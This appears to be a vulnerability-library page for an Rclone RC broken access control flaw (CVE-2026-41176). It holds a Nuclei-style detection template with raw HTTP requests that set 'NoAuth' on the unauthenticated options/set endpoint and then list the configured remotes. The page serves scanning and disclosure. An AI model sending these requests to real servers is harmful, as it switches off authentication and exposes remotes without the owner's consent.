/Vulnerability Library

Rclone RC - Broken Access Control

CVE-2026-41176
Verified

Description

Rclone >= 1.45.0 and < 1.73.5 contains a broken access control vulnerability caused by unauthenticated access to the RC endpoint `options/set` allowing mutation of global runtime configuration, letting unauthenticated attackers access sensitive administrative functions, exploit requires RC server started without global HTTP authentication.

Severity

Critical

CVSS Score

9.2

Exploit Probability

17%

Affected Product

rclone

Published Date

April 23, 2026

Template Author

theamanrawat

CVE-2026-41176.yaml
id: CVE-2026-41176

info:
  name: Rclone RC - Broken Access Control
  author: theamanrawat
  severity: critical
  description: |
    Rclone >= 1.45.0 and < 1.73.5 contains a broken access control vulnerability caused by unauthenticated access to the RC endpoint `options/set` allowing mutation of global runtime configuration, letting unauthenticated attackers access sensitive administrative functions, exploit requires RC server started without global HTTP authentication.
  impact: |
    Unauthenticated attackers can access sensitive administrative functions, potentially leading to full control over the RC server configuration and operations.
  remediation: |
    Upgrade to version 1.73.5 or later.
  reference:
    - https://github.com/rclone/rclone/security/advisories/GHSA-25qr-6mpr-f7qx
    - https://nvd.nist.gov/vuln/detail/CVE-2026-41176
  classification:
    cvss-score: 9.2
    cve-id: CVE-2026-41176
    epss-score: 0.16737
    epss-percentile: 0.95024
    cwe-id: CWE-306
  metadata:
    verified: true
    max-request: 4
    vendor: rclone
    product: rclone
  tags: cve,cve2026,rclone,auth-bypass,rce,unauth,vkev

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST /config/listremotes HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 403'
          - 'contains(content_type, "application/json")'
        condition: and
        internal: true

  - raw:
      - |
        POST /options/set HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"rc":{"NoAuth":true}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{}")'
          - 'contains(content_type, "application/json")'
        condition: and
        internal: true

  - raw:
      - |
        POST /config/listremotes HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

      - |
        POST /options/set HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"rc":{"NoAuth":false}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "remotes")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4a0a0047304502204d1bb79744c55b94102c33a6f4c49dcfe03d8f4fedd7a5b62acbc40f1c03597802210089f333fd97552c051627679e6dbc0165a3ac27ef239a8988e87ca967767b724e:922c64590222798bb761d5b6d8e72950
9.2Score

CVSS Metrics

CVE ID:
cve-2026-41176
CWE ID:
cwe-306

References

https://github.com/rclone/rclone/security/advisories/GHSA-25qr-6mpr-f7qxhttps://nvd.nist.gov/vuln/detail/CVE-2026-41176

Remediation Steps

Upgrade to version 1.73.5 or later.